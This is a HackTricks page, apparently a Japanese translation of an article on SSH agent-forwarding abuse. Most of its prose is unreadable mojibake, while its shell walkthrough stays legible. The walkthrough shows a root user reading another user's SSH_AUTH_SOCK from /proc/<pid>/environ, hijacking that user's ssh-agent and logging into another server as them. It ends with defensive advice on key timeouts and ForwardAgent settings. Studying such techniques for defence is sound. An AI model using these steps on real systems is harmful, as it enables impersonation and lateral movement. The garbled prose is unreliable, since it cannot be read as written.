16 KiB
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopmã
-
**ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããª**ã«PRãæåºããŠãã ããã
æŠèŠ
/etc/ssh_config
ãŸãã¯$HOME/.ssh/config
ã®èšå®å
ã«æ¬¡ã®ãããªãã®ãèŠã€ãã£ãå Žåãã©ã®ãããªããšãã§ããã§ããããïŒ
ForwardAgent yes
ãããã·ã³å ã§rootæš©éãæã£ãŠããå Žåããããã/tmpãã£ã¬ã¯ããªå ã§èŠã€ããããšãã§ããä»»æã®ãšãŒãžã§ã³ãã«ãã£ãŠäœæãããsshæ¥ç¶ã«ã¢ã¯ã»ã¹ããããšãã§ããŸãã
Bobã®ssh-agentã®1ã€ã䜿çšããŠBobã«ãªãããŸããŸãïŒ
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
ãªããããæ©èœããã®ãïŒ
å€æ° SSH_AUTH_SOCK
ãèšå®ãããšãBob ã®ããŒã«ã¢ã¯ã»ã¹ããããšãã§ããŸãããããã®ããŒã¯Bobã®sshæ¥ç¶ã§äœ¿çšãããŠããŸãããã®åŸã圌ã®ç§å¯éµããŸã ããã«ããå ŽåïŒéåžžã¯ããã§ããïŒãããã䜿çšããŠä»»æã®ãã¹ãã«ã¢ã¯ã»ã¹ããããšãã§ããŸãã
ç§å¯éµã¯ãšãŒãžã§ã³ãã®ã¡ã¢ãªã«å¹³æã§ä¿åãããŠãããããBobã§ãã£ãŠãç§å¯éµã®ãã¹ã¯ãŒããç¥ããªããŠããšãŒãžã§ã³ãã«ã¢ã¯ã»ã¹ããŠäœ¿çšããããšãã§ãããšæãããŸãã
ããäžã€ã®ãªãã·ã§ã³ã¯ããšãŒãžã§ã³ãã®ææè ã§ãããŠãŒã¶ãŒãšrootããšãŒãžã§ã³ãã®ã¡ã¢ãªã«ã¢ã¯ã»ã¹ããŠç§å¯éµãæœåºã§ããå¯èœæ§ããããšããããšã§ãã
詳ãã説æãšæ»æææ³
åŒçšå : https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/
ForwardAgentãä¿¡é Œã§ããªãå Žå
ãã¹ã¯ãŒããªãã§ã®SSHã¯ãUnixç³»ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã§ã®äœæ¥ãéåžžã«ç°¡åã«ããŸãããããã¯ãŒã¯ããã§ãŒã³ãããSSHã»ãã·ã§ã³ïŒå¶éããããããã¯ãŒã¯ãžã®ã¢ã¯ã»ã¹ãªã©ïŒãå¿ èŠãšããå ŽåããšãŒãžã§ã³ãã®è»¢éã¯éåžžã«åœ¹ç«ã¡ãŸãããšãŒãžã§ã³ãã®è»¢éã䜿çšãããšãç§ã¯ã©ãããããããéçºãµãŒããŒã«æ¥ç¶ããããããããã«å¥ã®ãµãŒããŒã§svnãã§ãã¯ã¢ãŠããå®è¡ããããšãã§ããŸãããã¹ãŠã®ãã¹ã¯ãŒããªãã§ãåæã«ãã©ã€ããŒãããŒãããŒã«ã«ã¯ãŒã¯ã¹ããŒã·ã§ã³ã§å®å šã«ä¿æããŸãã
ããããããã¯å±éºã§ããã¯ã€ãã¯ãªãŠã§ãæ€çŽ¢ã§ãäžéãã¹ããä¿¡é Œã§ããå Žåã«ã®ã¿å®å šã§ãããšç€ºãèšäºãããã€ãèŠã€ãããŸãããããããªãå±éºãªã®ãã«ã€ããŠã®èª¬æã¯ã»ãšãã©èŠã€ãããŸããã
ããããã®èšäºã®ç®çã§ãããããããŸãã¯èæ¯ã説æããŸãã
ãã¹ã¯ãŒããªãèªèšŒã®ä»çµã¿
éåžžã®ã¢ãŒãã§èªèšŒããéãSSHã¯ãã¹ã¯ãŒãã䜿çšããŠããªããèªåèªèº«ã§ããããšã蚌æããŸãããµãŒããŒã¯ããã®ãã¹ã¯ãŒãã®ããã·ã¥ãšãã¡ã€ã«ã«ä¿åãããŠããããã·ã¥ãæ¯èŒããããã·ã¥ãäžèŽããããšãæ€èšŒããŠãããªããèš±å¯ããŸãã
æ»æè ããµãŒããŒã«éä¿¡ããããã¹ã¯ãŒããä¿è·ããããã«äœ¿çšãããæå·åãç Žãããšãã§ããã°ããããçãããšãã§ãããã€ã§ãããªããšããŠãã°ã€ã³ããããšãã§ããŸããæ»æè ãäœåäžåãã®è©Šè¡ãè¡ãããšãèš±ãããå Žåãæçµçã«ã¯ããªãã®ãã¹ã¯ãŒããæšæž¬ããããšãã§ããŸãã
ã¯ããã«å®å šãªèªèšŒæ¹æ³ã¯ããã¹ã¯ãŒããªãã§ãã°ã€ã³ããå ¬ééµèªèšŒã§ããå ¬ééµèªèšŒã«ã¯ãå ¬ééµãšç§å¯éµã®ãã¢ãå¿ èŠã§ããå ¬ééµã¯ãç§å¯éµã§ã®ã¿åŸ©å·åã§ããã¡ãã»ãŒãžãæå·åããŸãããªã¢ãŒãã³ã³ãã¥ãŒã¿ã¯ãããªãã«å¯ŸããŠç§å¯ã¡ãã»ãŒãžãæå·åããããã«ãããªãã®å ¬ééµã®ã³ããŒã䜿çšããŸããããªãã¯ãç§å¯éµã䜿çšããŠã¡ãã»ãŒãžã埩å·åããã¡ãã»ãŒãžããªã¢ãŒãã³ã³ãã¥ãŒã¿ã«éä¿¡ããããšã§ãããªããããªãã§ããããšã蚌æããŸããç§å¯éµã¯åžžã«ããŒã«ã«ã³ã³ãã¥ãŒã¿ã«å®å šã«ä¿ç®¡ãããŠãããæ»æããå®ãããŠããŸãã
ç§å¯éµã¯è²Žéãªãã®ã§ãããä¿è·ããå¿ èŠããããããããã©ã«ãã§ã¯æå·å圢åŒã§ä¿åãããŸããæ®å¿µãªãããããã¯äœ¿çšããåã«æå·åã®ãã¹ãã¬ãŒãºãå ¥åããå¿ èŠãããããšãæå³ããŸããå€ãã®èšäºã§ã¯ããã®äžäŸ¿ããé¿ããããã«ãã¹ãã¬ãŒãºã®ãªãïŒæå·åãããŠããªãïŒç§å¯éµã䜿çšããããšãææ¡ããŠããŸããããã¯æªãèãã§ãããªããªããããªãã®ã¯ãŒã¯ã¹ããŒã·ã§ã³ã«ã¢ã¯ã»ã¹ã§ãã人ïŒç©ççãªã¢ã¯ã»ã¹ãçé£ããŸãã¯ãããã³ã°ã«ããïŒã¯ãããªãã®å ¬ééµã§æ§æãããä»»æã®ã³ã³ãã¥ãŒã¿ã«èªç±ã«ã¢ã¯ã»ã¹ã§ããããã§ãã
OpenSSHã«ã¯ãããŒã«ã«ã¯ãŒã¯ã¹ããŒã·ã§ã³ã§å®è¡ãããããŒã¢ã³ã§ããssh-agentãå«ãŸããŠããŸããããã¯ãç§å¯éµã®åŸ©å·åãããã³ããŒãã¡ã¢ãªã«èªã¿èŸŒã¿ãŸãããããã£ãŠããã¹ãã¬ãŒãºãäžåºŠã ãå ¥åããå¿ èŠããããŸãããã®åŸãsshã¯ã©ã€ã¢ã³ãã䜿çšã§ããããŒã«ã«ã®ãœã±ãããæäŸããŸãããã®ãœã±ããã䜿çšããŠããªã¢ãŒããµãŒããŒããéä¿¡ãããæå·åãããã¡ãã»ãŒãžã埩å·åããããã«sshã¯ã©ã€ã¢ã³ãã«èŠæ±ããŸããããªãã®ç§å¯éµã¯ããã¹ã¯ãŒããå ¥åããã«sshã䜿çšããããšãã§ãããŸãŸã§ãããªãããssh-agentããã»ã¹ã®ã¡ã¢ãªã«å®å šã«ä¿ç®¡ãããŸãã
ForwardAgentã®åäœåç
å€ãã®ã¿ã¹ã¯ã§ã¯ãsshã»ãã·ã§ã³ãããã§ãŒã³ãããå¿ èŠããããŸããå ã»ã©ã®äŸãèããŠã¿ãŸããããç§ã¯ã¯ãŒã¯ã¹ããŒã·ã§ã³ããéçºãµãŒããŒã«sshæ¥ç¶ããŸããããã§ã"svn+ssh"ãããã³ã«ã䜿çšããŠsvnã®æŽæ°ãè¡ãå¿ èŠããããŸããå ±æãµãŒããŒã«ç§å¯éµã®å¹³æã³ããŒãæ®ããŠããã®ã¯æããªããšãªã®ã§ããã¹ã¯ãŒãèªèšŒã«å¶éãããŠããŸããŸãããã ããã¯ãŒã¯ã¹ããŒã·ã§ã³ã®sshèšå®ã§ãForwardAgentããæå¹ã«ããå Žåãsshã¯çµã¿èŸŒã¿ã®ãã³ããªã³ã°æ©èœã䜿çšããŠãéçºãµãŒããŒäžã«å¥ã®ãœã±ãããäœæãããããããŒã«ã«ã¯ãŒã¯ã¹ããŒã·ã§ã³äžã®ssh-agentãœã±ããã«ãã³ãã«ããŸããããã«ãããéçºãµãŒããŒäžã®sshã¯ã©ã€ã¢ã³ãã¯ãç§å¯éµã«ã¢ã¯ã»ã¹ããããšãªããsvnãµãŒããŒã«å¯ŸããŠããã®ç§å¯ã¡ãã»ãŒãžã埩å·åããŠãã ããããšããèŠæ±ãçŽæ¥ssh-agentã«éä¿¡ããèªèº«ãèªèšŒããŸãã
ãªããããå±éºãªã®ã
åçŽã«èšãã°ãäžéãµãŒããŒã§rootæš©éãæã€äººã¯ãããªãã®ssh-agentãèªç±ã«äœ¿çšããŠä»ã®ãµãŒããŒã«èªèšŒããããšãã§ããŸããç°¡åãªãã¢ã³ã¹ãã¬ãŒã·ã§ã³ã§ããããã©ãã»ã©ç°¡åã«è¡ããããã瀺ããŸãããã¹ãåãšãŠãŒã¶ãŒåã¯ãé¢ä¿è ãä¿è·ããããã«å€æŽãããŠããŸãã
ç§ã®ã©ãããããã§ã¯ãssh-agentãå®è¡ãããŠãããsshã¯ã©ã€ã¢ã³ãããã°ã©ã ãšãœã±ãããä»ããŠéä¿¡ããŠããŸãããã®ãœã±ãããžã®ãã¹ã¯ãSSH_AUTH_SOCKç°å¢å€æ°ã«ä¿åãããŠããŸãïŒ
mylaptop:~ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/launch-oQKpeY/Listeners
mylaptop:~ ls -l /tmp/launch-oQKpeY/Listeners
srwx------ 1 alice wheel 0 Apr 3 11:04 /tmp/launch-oQKpeY/Listeners
ssh-addããã°ã©ã ã䜿çšãããšããšãŒãžã§ã³ãå ã®ããŒã衚瀺ããã³æäœããããšãã§ããŸãã
mylaptop:~ alice$ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
ç§ã®ã©ãããããã®~/.ssh/configã«ã¯ãForwardAgent yesããšæžãããŠããŸãããããã£ãŠãsshã¯ããŒã«ã«ãœã±ãããšãªã¢ãŒããµãŒããŒäžã®ããŒã«ã«ãœã±ãããæ¥ç¶ãããã³ãã«ãäœæããŸãã
mylaptop:~ alice$ ssh seattle
seattle:~ $ env|grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-WsKcHa9990/agent.9990
ããšãç§ã®ããŒããseattleãã«ã€ã³ã¹ããŒã«ãããŠããªããŠããsshã¯ã©ã€ã¢ã³ãããã°ã©ã ã¯ãŸã ããŒã«ã«ãã·ã³ã§å®è¡ãããŠãããšãŒãžã§ã³ãã«ã¢ã¯ã»ã¹ããããšãã§ããŸãã
seattle:~ alice $ ssh-add -l
2048 2c:2a:d6:09:bb:55:b3:ca:0c:f1:30:f9:d9:a3:c6:9e /Users/alice/.ssh/id_rsa (RSA)
ããã§ãã...誰ãæ»æããŸããããïŒ
seattle:~ alice $ who
alice pts/0 2012-04-06 18:24 (office.example.com)
bob pts/1 2012-04-03 01:29 (office.example.com)
alice pts/3 2012-04-06 18:31 (office.example.com)
alice pts/5 2012-04-06 18:31 (office.example.com)
alice pts/6 2012-04-06 18:33 (office.example.com)
charlie pts/23 2012-04-06 13:10 (office.example.com)
charlie pts/27 2012-04-03 12:32 (office.example.com)
bob pts/29 2012-04-02 10:58 (office.example.com)
ç§ã¯Bobã奜ãã§ã¯ãããŸããã圌ã®ãšãŒãžã§ã³ãæ¥ç¶ãèŠã€ããããã«ã圌ã®sshã»ãã·ã§ã³ã®åããã»ã¹ãèŠã€ããå¿ èŠããããŸãã
seattle:~ alice $ sudo -s
[sudo] password for alice:
seattle:~ root # pstree -p bob
sshd(16816)âââbash(16817)
sshd(25296)âââbash(25297)âââvim(14308)
以äžã¯ãå®è¡äžã®ããã»ã¹ã®ç°å¢ãrootã衚瀺ããããã®ããã€ãã®æ¹æ³ããããŸããLinuxã§ã¯ãããŒã¿ã¯/proc/<pid>/environã«æ ŒçŽãããŠããŸããNULLã§çµããæååã§ä¿åãããŠãããããNULLãæ¹è¡ã«å€æããããã«trã䜿çšããŸãã
seattle:~ root # tr '' 'n' < /proc/16817/environ | grep SSH_AUTH_SOCK
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816
ç§ã¯ä»ãBobã®ssh-agentãä¹ã£åãããã«å¿ èŠãªãã¹ãŠã®æ å ±ãæã£ãŠããŸãã
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh-add -l
2048 05:f1:12:f2:e6:ad:cb:0b:60:e3:92:fa:c3:62:19:17 /home/bob/.ssh/id_rsa (RSA)
ããç¹å®ã®ã¿ãŒã²ãããæã£ãŠããå Žåã¯ãçŽæ¥æ¥ç¶ã§ããã¯ãã§ããããã§ãªãå Žåã¯ãããã»ã¹ãªã¹ããç£èŠããããBobã®å±¥æŽãã¡ã€ã«ãgrepãããããã ãã§ãããããã®æ©äŒã®ã¿ãŒã²ãããèŠã€ããã¯ãã§ãããã®å Žåãç§ã¯BobããµãŒããŒããã¹ãã³ããšããååã®äžã«ç§å¯ã®ãã¡ã€ã«ãããããæã£ãŠããããšãç¥ã£ãŠããŸãã
seattle:~ root # SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
bob@boston:~$ whoami
bob
ç§ã¯ãseattleãã§ã®ã«ãŒãæš©éãå©çšããŠãbostonãã®ãããšããŠã¢ã¯ã»ã¹ããããšã«æåããŸããã圌ãã¯ãã«ããããã«ãããå©çšã§ãããšæããŸãã
èªå·±ä¿è·ïŒ
ssh-agentã«ããŒãç¡æéã«ä¿åãããªãã§ãã ãããOS Xã§ã¯ãKeychainãéã¢ã¯ãã£ãæãç»é¢ãããã¯ãããæã«ããã¯ããããã«èšå®ããŠãã ãããä»ã®Unixç³»ãã©ãããã©ãŒã ã§ã¯ãssh-agentã«-tãªãã·ã§ã³ãæž¡ãããšã§ãããŒãç§åŸã«åé€ãããããã«ããŸãã
ä¿¡é Œã§ããªããã¹ãã«æ¥ç¶ããéã«ã¯ããšãŒãžã§ã³ããã©ã¯ãŒãã£ã³ã°ãæå¹ã«ããªãã§ãã ããã幞ããªããšã«ã~/.ssh/configã®æ§æã䜿çšãããšãããã¯ããªãç°¡åã§ãã
Host trustworthyhost
ForwardAgent yes
Host *
ForwardAgent no
ããããã®èªã¿ç©
- OpenSSHããŒã®ç®¡ç - Daniel Robbins
- SSHãšãŒãžã§ã³ããã©ã¯ãŒãã£ã³ã°ã®ã€ã©ã¹ãå ¥ãã¬ã€ã - Steve Friedl
- ssh-agentããã¥ã¢ã«
- ssh-addããã¥ã¢ã«
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ãHackTricksã®PDFãããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitter ðŠ@carlospolopmããã©ããŒããŠãã ããã
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã